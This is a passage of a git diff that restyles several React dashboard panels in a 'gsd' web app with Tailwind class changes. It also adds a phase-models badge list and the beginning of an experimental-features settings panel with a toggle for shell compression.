-              <div className="rounded-lg border border-border/30 bg-card/30 px-3 py-2.5 space-y-1.5">
-                <h4 className="text-[11px] font-medium text-foreground/70 uppercase tracking-wide">Last Completed Unit</h4>
+              <div className="rounded-lg border border-border/50 bg-card/50 px-3 py-2.5 space-y-1.5">
+                <h4 className="text-[11px] font-medium text-muted-foreground uppercase tracking-wide">Last Completed Unit</h4>
                 <div className="grid grid-cols-2 gap-x-4 gap-y-0.5 text-[11px]">
                   <span className="text-muted-foreground">Type</span>
                   <span className="font-mono text-foreground/80">{data.lastUnitType}</span>
@@ -449,7 +449,7 @@ export function UndoPanel() {
               {/* Commit SHAs */}
               {data.commits.length > 0 && (
                 <div className="space-y-1.5">
-                  <h4 className="text-[11px] font-medium text-foreground/70">Associated Commits</h4>
+                  <h4 className="text-[11px] font-medium text-muted-foreground">Associated Commits</h4>
                   <div className="flex flex-wrap gap-1">
                     {data.commits.map((sha) => (
                       <Badge key={sha} variant="outline" className="text-[10px] px-1.5 py-0 font-mono">
@@ -565,13 +565,13 @@ export function SteerPanel() {
 
       {/* Current overrides */}
       <div className="space-y-2">
-        <h4 className="text-[11px] font-medium text-foreground/70 uppercase tracking-wide">Current Overrides</h4>
+        <h4 className="text-[11px] font-medium text-muted-foreground uppercase tracking-wide">Current Overrides</h4>
         {data?.overridesContent ? (
-          <div className="rounded-lg border border-border/30 bg-background/50 px-3 py-2.5 text-[11px] font-mono text-foreground/80 whitespace-pre-wrap max-h-[200px] overflow-y-auto leading-relaxed">
+          <div className="rounded-lg border border-border/50 bg-background/50 px-3 py-2.5 text-[11px] font-mono text-foreground/80 whitespace-pre-wrap max-h-[200px] overflow-y-auto leading-relaxed">
             {data.overridesContent}
           </div>
         ) : (
-          <div className="rounded-lg border border-border/30 bg-card/30 px-3 py-2.5 text-[11px] text-muted-foreground italic">
+          <div className="rounded-lg border border-border/50 bg-card/50 px-3 py-2.5 text-[11px] text-muted-foreground italic">
             No active overrides
           </div>
         )}
@@ -579,7 +579,7 @@ export function SteerPanel() {
 
       {/* Steer message form */}
       <div className="space-y-2">
-        <h4 className="text-[11px] font-medium text-foreground/70 uppercase tracking-wide">Send Steering Message</h4>
+        <h4 className="text-[11px] font-medium text-muted-foreground uppercase tracking-wide">Send Steering Message</h4>
         <Textarea
           value={message}
           onChange={(e) => setMessage(e.target.value)}
@@ -633,10 +633,10 @@ export function HooksPanel() {
       {data && (
         <>
           {data.entries.length > 0 ? (
-            <div className="overflow-x-auto rounded-lg border border-border/30">
+            <div className="overflow-x-auto rounded-lg border border-border/50">
               <table className="w-full text-[11px]">
                 <thead>
-                  <tr className="border-b border-border/30 bg-card/40">
+                  <tr className="border-b border-border/50 bg-card/50">
                     <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">Name</th>
                     <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">Type</th>
                     <th className="px-2.5 py-1.5 text-center font-medium text-muted-foreground">Status</th>
@@ -648,7 +648,7 @@ export function HooksPanel() {
                   {data.entries.map((entry: HookStatusEntry) => {
                     const totalCycles = Object.values(entry.activeCycles).reduce((sum, n) => sum + n, 0)
                     return (
-                      <tr key={entry.name} className="border-b border-border/20 last:border-0">
+                      <tr key={entry.name} className="border-b border-border/50 last:border-0">
                         <td className="px-2.5 py-1.5 font-mono text-foreground/80">{entry.name}</td>
                         <td className="px-2.5 py-1.5">
                           <Badge variant="outline" className="text-[10px] px-1.5 py-0">
@@ -684,7 +684,7 @@ export function HooksPanel() {
 
           {/* Formatted status */}
           {data.formattedStatus && (
-            <div className="rounded-lg border border-border/30 bg-background/50 px-3 py-2.5 text-[11px] font-mono text-foreground/70 whitespace-pre-wrap leading-relaxed">
+            <div className="rounded-lg border border-border/50 bg-background/50 px-3 py-2.5 text-[11px] font-mono text-muted-foreground whitespace-pre-wrap leading-relaxed">
               {data.formattedStatus}
             </div>
           )}
@@ -730,11 +730,11 @@ export function InspectPanel() {
           {/* Recent decisions */}
           {data.recentDecisions.length > 0 && (
             <div className="space-y-2">
-              <h4 className="text-xs font-medium text-foreground/70">Recent Decisions ({data.recentDecisions.length})</h4>
-              <div className="overflow-x-auto rounded-lg border border-border/30">
+              <h4 className="text-xs font-medium text-muted-foreground">Recent Decisions ({data.recentDecisions.length})</h4>
+              <div className="overflow-x-auto rounded-lg border border-border/50">
                 <table className="w-full text-[11px]">
                   <thead>
-                    <tr className="border-b border-border/30 bg-card/40">
+                    <tr className="border-b border-border/50 bg-card/50">
                       <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">ID</th>
                       <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">Decision</th>
                       <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">Choice</th>
@@ -742,7 +742,7 @@ export function InspectPanel() {
                   </thead>
                   <tbody>
                     {data.recentDecisions.map((d) => (
-                      <tr key={d.id} className="border-b border-border/20 last:border-0">
+                      <tr key={d.id} className="border-b border-border/50 last:border-0">
                         <td className="px-2.5 py-1.5 font-mono text-foreground/80">{d.id}</td>
                         <td className="px-2.5 py-1.5 text-foreground/80 max-w-[200px] truncate">{d.decision}</td>
                         <td className="px-2.5 py-1.5 text-muted-foreground max-w-[150px] truncate">{d.choice}</td>
@@ -757,11 +757,11 @@ export function InspectPanel() {
           {/* Recent requirements */}
           {data.recentRequirements.length > 0 && (
             <div className="space-y-2">
-              <h4 className="text-xs font-medium text-foreground/70">Recent Requirements ({data.recentRequirements.length})</h4>
-              <div className="overflow-x-auto rounded-lg border border-border/30">
+              <h4 className="text-xs font-medium text-muted-foreground">Recent Requirements ({data.recentRequirements.length})</h4>
+              <div className="overflow-x-auto rounded-lg border border-border/50">
                 <table className="w-full text-[11px]">
                   <thead>
-                    <tr className="border-b border-border/30 bg-card/40">
+                    <tr className="border-b border-border/50 bg-card/50">
                       <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">ID</th>
                       <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">Status</th>
                       <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">Description</th>
@@ -769,7 +769,7 @@ export function InspectPanel() {
                   </thead>
                   <tbody>
                     {data.recentRequirements.map((r) => (
-                      <tr key={r.id} className="border-b border-border/20 last:border-0">
+                      <tr key={r.id} className="border-b border-border/50 last:border-0">
                         <td className="px-2.5 py-1.5 font-mono text-foreground/80">{r.id}</td>
                         <td className="px-2.5 py-1.5">
                           <Badge
@@ -843,8 +843,8 @@ export function ExportPanel() {
 
       {/* Format selector */}
       <div className="space-y-2">
-        <h4 className="text-[11px] font-medium text-foreground/70 uppercase tracking-wide">Format</h4>
-        <div className="flex gap-1 rounded-lg border border-border/30 bg-card/20 p-0.5">
+        <h4 className="text-[11px] font-medium text-muted-foreground uppercase tracking-wide">Format</h4>
+        <div className="flex gap-1 rounded-lg border border-border/50 bg-card/50 p-0.5">
           {(["markdown", "json"] as const).map((f) => (
             <button
               key={f}
@@ -853,8 +853,8 @@ export function ExportPanel() {
               className={cn(
                 "flex-1 rounded-md px-3 py-1.5 text-[11px] font-medium capitalize transition-colors",
                 format === f
-                  ? "bg-card/80 text-foreground shadow-sm"
-                  : "text-muted-foreground hover:text-foreground/70",
+                  ? "bg-card text-foreground shadow-sm"
+                  : "text-muted-foreground hover:text-muted-foreground",
               )}
             >
               {f === "markdown" ? "Markdown" : "JSON"}
@@ -884,7 +884,7 @@ export function ExportPanel() {
             <span className="font-medium">Export Ready</span>
           </div>
           <div className="flex items-center justify-between gap-2">
-            <span className="text-[11px] font-mono text-foreground/70">{data.filename}</span>
+            <span className="text-[11px] font-mono text-muted-foreground">{data.filename}</span>
             <Button
               type="button"
               variant="ghost"
@@ -952,7 +952,7 @@ export function CleanupPanel() {
             <CheckCircle2 className="h-3.5 w-3.5" />
             <span className="font-medium">Cleanup Complete</span>
           </div>
-          <p className="mt-1 text-[11px] text-foreground/70">{result.message}</p>
+          <p className="mt-1 text-[11px] text-muted-foreground">{result.message}</p>
         </div>
       )}
 
@@ -961,7 +961,7 @@ export function CleanupPanel() {
           {/* Branches table */}
           <div className="space-y-2">
             <div className="flex items-center justify-between">
-              <h4 className="text-xs font-medium text-foreground/70">Branches ({data.branches.length})</h4>
+              <h4 className="text-xs font-medium text-muted-foreground">Branches ({data.branches.length})</h4>
               {mergedBranches.length > 0 && (
                 <Button
                   type="button"
@@ -977,17 +977,17 @@ export function CleanupPanel() {
               )}
             </div>
             {data.branches.length > 0 ? (
-              <div className="overflow-x-auto rounded-lg border border-border/30">
+              <div className="overflow-x-auto rounded-lg border border-border/50">
                 <table className="w-full text-[11px]">
                   <thead>
-                    <tr className="border-b border-border/30 bg-card/40">
+                    <tr className="border-b border-border/50 bg-card/50">
                       <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">Branch</th>
                       <th className="px-2.5 py-1.5 text-center font-medium text-muted-foreground">Status</th>
                     </tr>
                   </thead>
                   <tbody>
                     {data.branches.map((b: CleanupBranch) => (
-                      <tr key={b.name} className="border-b border-border/20 last:border-0">
+                      <tr key={b.name} className="border-b border-border/50 last:border-0">
                         <td className="px-2.5 py-1.5 font-mono text-foreground/80 truncate max-w-[250px]">
                           <span className="flex items-center gap-1.5">
                             <GitBranch className="h-3 w-3 text-muted-foreground shrink-0" />
@@ -1018,7 +1018,7 @@ export function CleanupPanel() {
           {/* Snapshots table */}
           <div className="space-y-2">
             <div className="flex items-center justify-between">
-              <h4 className="text-xs font-medium text-foreground/70">Snapshots ({data.snapshots.length})</h4>
+              <h4 className="text-xs font-medium text-muted-foreground">Snapshots ({data.snapshots.length})</h4>
               {oldSnapshots.length > 0 && (
                 <Button
                   type="button"
@@ -1034,17 +1034,17 @@ export function CleanupPanel() {
               )}
             </div>
             {data.snapshots.length > 0 ? (
-              <div className="overflow-x-auto rounded-lg border border-border/30">
+              <div className="overflow-x-auto rounded-lg border border-border/50">
                 <table className="w-full text-[11px]">
                   <thead>
-                    <tr className="border-b border-border/30 bg-card/40">
+                    <tr className="border-b border-border/50 bg-card/50">
                       <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">Ref</th>
                       <th className="px-2.5 py-1.5 text-right font-medium text-muted-foreground">Date</th>
                     </tr>
                   </thead>
                   <tbody>
                     {data.snapshots.map((s: CleanupSnapshot) => (
-                      <tr key={s.ref} className="border-b border-border/20 last:border-0">
+                      <tr key={s.ref} className="border-b border-border/50 last:border-0">
                         <td className="px-2.5 py-1.5 font-mono text-foreground/80 truncate max-w-[200px]">{s.ref}</td>
                         <td className="px-2.5 py-1.5 text-right text-muted-foreground">{s.date}</td>
                       </tr>
@@ -1101,13 +1101,13 @@ export function QueuePanel() {
                   "rounded-lg border px-3 py-2.5 space-y-1.5",
                   isActive
                     ? "border-info/25 bg-info/5"
-                    : "border-border/30 bg-card/30",
+                    : "border-border/50 bg-card/50",
                 )}
               >
                 <div className="flex items-center justify-between gap-2">
                   <div className="flex items-center gap-2">
                     <span className="text-xs font-mono font-medium text-foreground/80">{m.id}</span>
-                    <span className="text-xs text-foreground/90 truncate">{m.title}</span>
+                    <span className="text-xs text-foreground truncate">{m.title}</span>
                     {isActive && (
                       <Badge variant="secondary" className="text-[10px] px-1.5 py-0 border-info/30 text-info">
                         active
@@ -1121,7 +1121,7 @@ export function QueuePanel() {
 
                 {/* Progress bar */}
                 {progress.total > 0 && (
-                  <div className="h-1 rounded-full bg-border/30 overflow-hidden">
+                  <div className="h-1 rounded-full bg-border/50 overflow-hidden">
                     <div
                       className={cn(
                         "h-full rounded-full transition-all",
@@ -1194,8 +1194,8 @@ export function StatusPanel() {
       />
 
       {/* Active context card */}
-      <div className="rounded-lg border border-border/30 bg-card/30 px-3 py-3 space-y-2">
-        <h4 className="text-[11px] font-medium text-foreground/70 uppercase tracking-wide">Active Context</h4>
+      <div className="rounded-lg border border-border/50 bg-card/50 px-3 py-3 space-y-2">
+        <h4 className="text-[11px] font-medium text-muted-foreground uppercase tracking-wide">Active Context</h4>
         <div className="grid grid-cols-[auto_1fr] gap-x-4 gap-y-1 text-[11px]">
           <span className="text-muted-foreground">Phase</span>
           <span className="font-mono text-foreground/80">
@@ -1244,7 +1244,7 @@ export function StatusPanel() {
             <span>Overall Progress</span>
             <span className="tabular-nums">{Math.round((doneSlices / totalSlices) * 100)}%</span>
           </div>
-          <div className="h-1.5 rounded-full bg-border/30 overflow-hidden">
+          <div className="h-1.5 rounded-full bg-border/50 overflow-hidden">
             <div
               className={cn(
                 "h-full rounded-full transition-all",
diff --git a/web/components/gsd/roadmap.tsx b/web/components/gsd/roadmap.tsx
index 3dbc59ec2..ea8083054 100644
--- a/web/components/gsd/roadmap.tsx
+++ b/web/components/gsd/roadmap.tsx
@@ -19,7 +19,7 @@ const StatusIcon = ({
   if (status === "in-progress") {
     return <Play className={cn(sizeClass, "text-warning")} />
   }
-  return <Circle className={cn(sizeClass, "text-muted-foreground/40")} />
+  return <Circle className={cn(sizeClass, "text-muted-foreground")} />
 }
 
 const RiskBadge = ({ risk }: { risk: RiskLevel }) => {
@@ -113,7 +113,7 @@ export function Roadmap() {
                         className={cn(
                           "flex items-center gap-3 px-4 py-2.5",
                           sliceStatus === "in-progress" && "bg-accent/20",
-                          sliceStatus === "pending" && "opacity-60",
+                          sliceStatus === "pending" && "opacity-70",
                         )}
                       >
                         <div className="w-4" />
diff --git a/web/components/gsd/scope-badge.tsx b/web/components/gsd/scope-badge.tsx
index 0c7d6d80a..127c5329c 100644
--- a/web/components/gsd/scope-badge.tsx
+++ b/web/components/gsd/scope-badge.tsx
@@ -29,6 +29,8 @@ function phasePresentation(phase: string): { label: string; tone: PhaseTone } {
       return { label: "Replanning", tone: "info" }
     case "completing-milestone":
       return { label: "Completing", tone: "info" }
+    case "evaluating-gates":
+      return { label: "Evaluating Gates", tone: "info" }
     default:
       return { label: phase, tone: "muted" }
   }
diff --git a/web/components/gsd/settings-panels.tsx b/web/components/gsd/settings-panels.tsx
index 877f11703..f945295e1 100644
--- a/web/components/gsd/settings-panels.tsx
+++ b/web/components/gsd/settings-panels.tsx
@@ -9,6 +9,7 @@ import {
   DollarSign,
   Eye,
   EyeOff,
+  FlaskConical,
   KeyRound,
   LoaderCircle,
   Radio,
@@ -57,7 +58,7 @@ function SettingsHeader({
     <div className="flex items-center justify-between gap-3 pb-4">
       <div className="flex items-center gap-2.5">
         <span className="text-muted-foreground">{icon}</span>
-        <h3 className="text-[13px] font-semibold uppercase tracking-[0.08em] text-foreground/70">{title}</h3>
+        <h3 className="text-[13px] font-semibold uppercase tracking-[0.08em] text-muted-foreground">{title}</h3>
         {subtitle && <span className="text-[11px] text-muted-foreground">{subtitle}</span>}
       </div>
       <Button type="button" variant="ghost" size="sm" onClick={onRefresh} disabled={refreshing} className="h-7 gap-1.5 text-xs">
@@ -87,7 +88,7 @@ function SettingsLoading({ label }: { label: string }) {
 
 function SettingsEmpty({ message }: { message: string }) {
   return (
-    <div className="rounded-lg border border-border/30 bg-card/30 px-4 py-5 text-center text-xs text-muted-foreground">
+    <div className="rounded-lg border border-border/50 bg-card/50 px-4 py-5 text-center text-xs text-muted-foreground">
       {message}
     </div>
   )
@@ -100,7 +101,7 @@ function Pill({ label, value, variant }: { label: string; value: string | number
       variant === "info" && "border-info/20 bg-info/5 text-info",
       variant === "warning" && "border-warning/20 bg-warning/5 text-warning",
       variant === "success" && "border-success/20 bg-success/5 text-success",
-      (!variant || variant === "default") && "border-border/40 bg-card/50 text-foreground/80",
+      (!variant || variant === "default") && "border-border/50 bg-card/50 text-foreground/80",
     )}>
       <span className="text-muted-foreground">{label}</span>
       <span className="font-medium tabular-nums">{value}</span>
@@ -138,6 +139,24 @@ function SkillBadgeList({ label, skills }: { label: string; skills: string[] | u
   )
 }
 
+function ModelBadgeList({ models }: { models: Record<string, string> | undefined }) {
+  if (!models || Object.keys(models).length === 0) return null
+  return (
+    <div className="space-y-1">
+      <span className="text-[11px] text-muted-foreground">Phase Models</span>
+      <div className="flex flex-wrap gap-1">
+        {Object.entries(models)
+          .sort(([a], [b]) => a.localeCompare(b))
+          .map(([phase, model]) => (
+            <Badge key={phase} variant="outline" className="text-[10px] px-1.5 py-0 font-mono">
+              {phase}: {model}
+            </Badge>
+          ))}
+      </div>
+    </div>
+  )
+}
+
 function KvRow({ label, children }: { label: string; children: React.ReactNode }) {
   return (
     <div className="flex items-center justify-between gap-4 text-xs">
@@ -205,16 +224,21 @@ export function PrefsPanel() {
 
           {/* Skills */}
           <div className="space-y-2">
+            <ModelBadgeList models={prefs.models} />
             <SkillBadgeList label="Always use" skills={prefs.alwaysUseSkills} />
             <SkillBadgeList label="Prefer" skills={prefs.preferSkills} />
             <SkillBadgeList label="Avoid" skills={prefs.avoidSkills} />
-            {!prefs.alwaysUseSkills?.length && !prefs.preferSkills?.length && !prefs.avoidSkills?.length && (
-              <span className="text-[11px] text-muted-foreground">No skill preferences configured</span>
-            )}
+            {!prefs.models || Object.keys(prefs.models).length === 0
+              ? !prefs.alwaysUseSkills?.length && !prefs.preferSkills?.length && !prefs.avoidSkills?.length && (
+                <span className="text-[11px] text-muted-foreground">No model or skill preferences configured</span>
+              )
+              : !prefs.alwaysUseSkills?.length && !prefs.preferSkills?.length && !prefs.avoidSkills?.length && (
+                <span className="text-[11px] text-muted-foreground">No skill preferences configured</span>
+              )}
           </div>
 
           {/* Toggles */}
-          <div className="grid grid-cols-2 gap-x-6 gap-y-1.5 rounded-lg border border-border/30 bg-card/30 px-3 py-2.5">
+          <div className="grid grid-cols-2 gap-x-6 gap-y-1.5 rounded-lg border border-border/50 bg-card/50 px-3 py-2.5">
             <KvRow label="Auto-Supervisor">
               {prefs.autoSupervisor?.enabled ? (
                 <span className="text-success">
@@ -342,8 +366,8 @@ export function ModelRoutingPanel() {
 
           {/* Tier assignments */}
           {routingConfig?.tier_models && (
-            <div className="rounded-lg border border-border/30 bg-card/30 px-3 py-2.5 space-y-1.5">
-              <h4 className="text-[11px] font-medium text-foreground/70 uppercase tracking-wide">Tier Assignments</h4>
+            <div className="rounded-lg border border-border/50 bg-card/50 px-3 py-2.5 space-y-1.5">
+              <h4 className="text-[11px] font-medium text-muted-foreground uppercase tracking-wide">Tier Assignments</h4>
               <TierModelRow tier="light" modelId={routingConfig.tier_models.light} />
               <TierModelRow tier="standard" modelId={routingConfig.tier_models.standard} />
               <TierModelRow tier="heavy" modelId={routingConfig.tier_models.heavy} />
@@ -369,10 +393,10 @@ export function ModelRoutingPanel() {
               {/* Top patterns table */}
               {Object.keys(routingHistory.patterns).length > 0 && (
                 <div className="space-y-1.5">
-                  <h4 className="text-[11px] font-medium text-foreground/70">Top Patterns</h4>
+                  <h4 className="text-[11px] font-medium text-muted-foreground">Top Patterns</h4>
                   <div className="space-y-2">
                     {topPatterns(routingHistory).map(({ name, total, pattern }) => (
-                      <div key={name} className="rounded-lg border border-border/30 bg-card/30 px-3 py-2 space-y-1">
+                      <div key={name} className="rounded-lg border border-border/50 bg-card/50 px-3 py-2 space-y-1">
                         <div className="flex items-center justify-between gap-2">
                           <span className="text-xs font-mono text-foreground/80 truncate">{name}</span>
                           <span className="text-[10px] text-muted-foreground tabular-nums shrink-0">{total} attempts</span>
@@ -454,8 +478,8 @@ export function BudgetPanel() {
 
           {/* Context budget allocations */}
           {budget && (
-            <div className="rounded-lg border border-border/30 bg-card/30 px-3 py-2.5 space-y-1.5">
-              <h4 className="text-[11px] font-medium text-foreground/70 uppercase tracking-wide">Context Budget Allocations</h4>
+            <div className="rounded-lg border border-border/50 bg-card/50 px-3 py-2.5 space-y-1.5">
+              <h4 className="text-[11px] font-medium text-muted-foreground uppercase tracking-wide">Context Budget Allocations</h4>
               <KvRow label="Summary Budget">{formatChars(budget.summaryBudgetChars)} chars</KvRow>
               <KvRow label="Inline Context">{formatChars(budget.inlineContextBudgetChars)} chars</KvRow>
               <KvRow label="Verification">{formatChars(budget.verificationBudgetChars)} chars</KvRow>
@@ -467,7 +491,7 @@ export function BudgetPanel() {
           {/* Project cost totals */}
           {totals ? (
             <div className="space-y-3">
-              <h4 className="text-[11px] font-medium text-foreground/70 uppercase tracking-wide">Project Cost Totals</h4>
+              <h4 className="text-[11px] font-medium text-muted-foreground uppercase tracking-wide">Project Cost Totals</h4>
 
               {/* Summary pills */}
               <div className="flex flex-wrap gap-2">
@@ -477,8 +501,8 @@ export function BudgetPanel() {
               </div>
 
               {/* Token breakdown */}
-              <div className="rounded-lg border border-border/30 bg-card/30 px-3 py-2.5 space-y-1.5">
-                <h4 className="text-[11px] font-medium text-foreground/70 uppercase tracking-wide">Token Breakdown</h4>
+              <div className="rounded-lg border border-border/50 bg-card/50 px-3 py-2.5 space-y-1.5">
+                <h4 className="text-[11px] font-medium text-muted-foreground uppercase tracking-wide">Token Breakdown</h4>
                 <KvRow label="Input">{formatTokens(totals.tokens.input)}</KvRow>
                 <KvRow label="Output">{formatTokens(totals.tokens.output)}</KvRow>
                 <KvRow label="Cache Read">{formatTokens(totals.tokens.cacheRead)}</KvRow>
@@ -763,7 +787,7 @@ export function RemoteQuestionsPanel() {
 
       {/* ── Channel picker (card-based) ──────────────────────────── */}
       <div className="space-y-2">
-        <div className="text-xs font-medium text-muted-foreground/60">
+        <div className="text-xs font-medium text-muted-foreground">
           {isConfigured ? "Switch channel" : "Choose a channel"}
         </div>
         <div className="grid grid-cols-3 gap-2">
@@ -782,11 +806,11 @@ export function RemoteQuestionsPanel() {
                 "active:scale-[0.97]",
                 channel === opt.value
                   ? "border-foreground/30 bg-foreground/[0.06]"
-                  : "border-border/40 bg-card/20 hover:border-foreground/15 hover:bg-card/50",
+                  : "border-border/50 bg-card/50 hover:border-foreground/15 hover:bg-card/50",
               )}
             >
               <div className="text-sm font-medium text-foreground">{opt.label}</div>
-              <div className="mt-0.5 text-[11px] text-muted-foreground/60">{opt.description}</div>
+              <div className="mt-0.5 text-[11px] text-muted-foreground">{opt.description}</div>
             </button>
           ))}
         </div>
@@ -794,7 +818,7 @@ export function RemoteQuestionsPanel() {
 
       {/* ── Channel ID input ─────────────────────────────────────── */}
       <div className="space-y-2">
-        <div className="text-xs font-medium text-muted-foreground/60">Channel ID</div>
+        <div className="text-xs font-medium text-muted-foreground">Channel ID</div>
         <input
           type="text"
           value={channelId}
@@ -802,13 +826,13 @@ export function RemoteQuestionsPanel() {
           placeholder={selectedChannelOption.idPlaceholder}
           disabled={saving}
           className={cn(
-            "w-full rounded-xl border bg-card/20 px-4 py-2.5 font-mono text-sm text-foreground",
-            "placeholder:text-muted-foreground/40",
+            "w-full rounded-xl border bg-card/50 px-4 py-2.5 font-mono text-sm text-foreground",
+            "placeholder:text-muted-foreground",
             "focus:outline-none focus:ring-2 focus:ring-ring focus:border-transparent",
             "transition-colors",
             channelId.trim().length > 0 && !CHANNEL_ID_PATTERNS[channel].test(channelId.trim())
               ? "border-destructive/40"
-              : "border-border/40",
+              : "border-border/50",
           )}
           onKeyDown={(e) => { if (e.key === "Enter" && canSave) void handleSave() }}
         />
@@ -823,7 +847,7 @@ export function RemoteQuestionsPanel() {
       <button
         type="button"
         onClick={() => setShowAdvanced((v) => !v)}
-        className="flex items-center gap-1.5 text-[11px] text-muted-foreground/60 hover:text-muted-foreground transition-colors"
+        className="flex items-center gap-1.5 text-[11px] text-muted-foreground hover:text-muted-foreground transition-colors"
       >
         <svg
           className={cn("h-3 w-3 transition-transform", showAdvanced && "rotate-90")}
@@ -838,7 +862,7 @@ export function RemoteQuestionsPanel() {
       {showAdvanced && (
         <div className="grid grid-cols-2 gap-3 pl-4">
           <div className="space-y-1.5">
-            <label className="text-[11px] text-muted-foreground/60" htmlFor="rq-timeout">
+            <label className="text-[11px] text-muted-foreground" htmlFor="rq-timeout">
               Timeout (min)
             </label>
             <input
@@ -848,11 +872,11 @@ export function RemoteQuestionsPanel() {
               max={30}
               value={timeoutMinutes}
               onChange={(e) => setTimeoutMinutes(Math.max(1, Math.min(30, Number(e.target.value) || 1)))}
-              className="w-full rounded-lg border border-border/40 bg-card/20 px-3 py-2 text-xs text-foreground tabular-nums focus:outline-none focus:ring-2 focus:ring-ring"
+              className="w-full rounded-lg border border-border/50 bg-card/50 px-3 py-2 text-xs text-foreground tabular-nums focus:outline-none focus:ring-2 focus:ring-ring"
             />
           </div>
           <div className="space-y-1.5">
-            <label className="text-[11px] text-muted-foreground/60" htmlFor="rq-poll">
+            <label className="text-[11px] text-muted-foreground" htmlFor="rq-poll">
               Poll interval (sec)
             </label>
             <input
@@ -862,7 +886,7 @@ export function RemoteQuestionsPanel() {
               max={30}
               value={pollIntervalSeconds}
               onChange={(e) => setPollIntervalSeconds(Math.max(2, Math.min(30, Number(e.target.value) || 2)))}
-              className="w-full rounded-lg border border-border/40 bg-card/20 px-3 py-2 text-xs text-foreground tabular-nums focus:outline-none focus:ring-2 focus:ring-ring"
+              className="w-full rounded-lg border border-border/50 bg-card/50 px-3 py-2 text-xs text-foreground tabular-nums focus:outline-none focus:ring-2 focus:ring-ring"
             />
           </div>
         </div>
@@ -887,7 +911,7 @@ export function RemoteQuestionsPanel() {
 
       {/* ── Bot token ─────────────────────────────────────────── */}
       <div className="space-y-3">
-        <div className="text-xs font-medium text-muted-foreground/60">Bot token</div>
+        <div className="text-xs font-medium text-muted-foreground">Bot token</div>
 
         {tokenSuccess && (
           <div className="flex items-center gap-2.5 rounded-xl border border-success/15 bg-success/[0.04] px-4 py-2.5 text-xs text-muted-foreground">
@@ -919,8 +943,8 @@ export function RemoteQuestionsPanel() {
               placeholder={`Paste your ${selectedChannelOption.label} bot token`}
               disabled={savingToken}
               className={cn(
-                "w-full rounded-xl border border-border/40 bg-card/20 pl-4 pr-10 py-2.5 font-mono text-sm text-foreground",
-                "placeholder:text-muted-foreground/40",
+                "w-full rounded-xl border border-border/50 bg-card/50 pl-4 pr-10 py-2.5 font-mono text-sm text-foreground",
+                "placeholder:text-muted-foreground",
                 "focus:outline-none focus:ring-2 focus:ring-ring focus:border-transparent",
                 "transition-colors",
               )}
@@ -929,7 +953,7 @@ export function RemoteQuestionsPanel() {
             <button
               type="button"
               onClick={() => setShowToken((v) => !v)}
-              className="absolute right-3 top-1/2 -translate-y-1/2 text-muted-foreground/50 hover:text-muted-foreground transition-colors"
+              className="absolute right-3 top-1/2 -translate-y-1/2 text-muted-foreground hover:text-muted-foreground transition-colors"
             >
               {showToken ? <EyeOff className="h-3.5 w-3.5" /> : <Eye className="h-3.5 w-3.5" />}
             </button>
@@ -975,7 +999,7 @@ function FontSizeControl({
   previewFont: "mono" | "sans"
 }) {
   return (
-    <div className="rounded-lg border border-border/30 bg-card/30 px-3 py-3 space-y-3">
+    <div className="rounded-lg border border-border/50 bg-card/50 px-3 py-3 space-y-3">
       <div>
         <div className="text-xs font-medium text-foreground">{label}</div>
         <div className="text-[11px] text-muted-foreground mt-0.5">{description}</div>
@@ -991,12 +1015,12 @@ function FontSizeControl({
               "rounded-md border px-3 py-1.5 text-xs font-medium tabular-nums transition-colors",
               currentSize === size
                 ? "border-foreground/30 bg-foreground/10 text-foreground shadow-sm"
-                : "border-border/40 bg-card/50 text-muted-foreground hover:border-foreground/20 hover:text-foreground",
+                : "border-border/50 bg-card/50 text-muted-foreground hover:border-foreground/20 hover:text-foreground",
             )}
           >
             {size}px
             {size === defaultSize && (
-              <span className="ml-1 text-[10px] text-muted-foreground/60">(default)</span>
+              <span className="ml-1 text-[10px] text-muted-foreground">(default)</span>
             )}
           </button>
         ))}
@@ -1004,7 +1028,7 @@ function FontSizeControl({
 
       <div
         className={cn(
-          "mt-2 rounded-md border border-border/20 bg-terminal px-3 py-2 text-foreground/80",
+          "mt-2 rounded-md border border-border/50 bg-terminal px-3 py-2 text-foreground/80",
           previewFont === "mono" ? "font-mono" : "font-sans",
         )}
         style={{ fontSize: `${currentSize}px`, lineHeight: 1.35 }}
@@ -1052,6 +1076,165 @@ export function GeneralPanel() {
   )
 }
 
+// ═══════════════════════════════════════════════════════════════════════
+// EXPERIMENTAL PANEL
+// ═══════════════════════════════════════════════════════════════════════
+
+interface ExperimentalFlag {
+  key: string
+  label: string
+  description: string
+  warning?: string
+}
+
+const EXPERIMENTAL_FLAGS: ExperimentalFlag[] = [
+  {
+    key: "rtk",
+    label: "RTK Shell Compression",
+    description:
+      "Wraps shell commands through the RTK binary to reduce token usage during command execution. RTK is downloaded automatically on first use.",
+    warning: "Experimental — may change or be removed without notice.",
+  },
+]
+
+export function ExperimentalPanel() {
+  const { state, data, busy, refresh } = useSettingsData()
+  const prefs = data?.preferences ?? null
+
+  const [flags, setFlags] = useState<Record<string, boolean>>({})
+  const [saving, setSaving] = useState<Record<string, boolean>>({})
+  const [saveError, setSaveError] = useState<string | null>(null)
+
+  // Trigger a settings load if data hasn't been fetched yet (e.g. navigating
+  // directly to the Experimental tab without going through gsd-prefs first).
+  useEffect(() => {
+    if (!data && !busy && state.phase === "idle") {
+      refresh()
+    }
+  }, []) // eslint-disable-line react-hooks/exhaustive-deps
+
+  // Sync local state from loaded prefs
+  useEffect(() => {
+    if (!prefs) return
+    setFlags({ rtk: prefs.experimental?.rtk === true })
+  }, [prefs])
+
+  async function toggle(flagKey: string, next: boolean) {
+    setSaving((s) => ({ ...s, [flagKey]: true }))
+    setSaveError(null)
+    try {
+      const res = await authFetch("/api/experimental", {
+        method: "PATCH",
+        headers: { "Content-Type": "application/json" },
+        body: JSON.stringify({ flag: flagKey, enabled: next }),
+      })
+      if (!res.ok) {
+        const body = await res.json().catch(() => ({})) as { error?: string }
+        throw new Error(body.error ?? `HTTP ${res.status}`)
+      }
+      setFlags((f) => ({ ...f, [flagKey]: next }))
+      // Refresh settings data so PrefsPanel reflects the change
+      refresh()
+    } catch (err) {
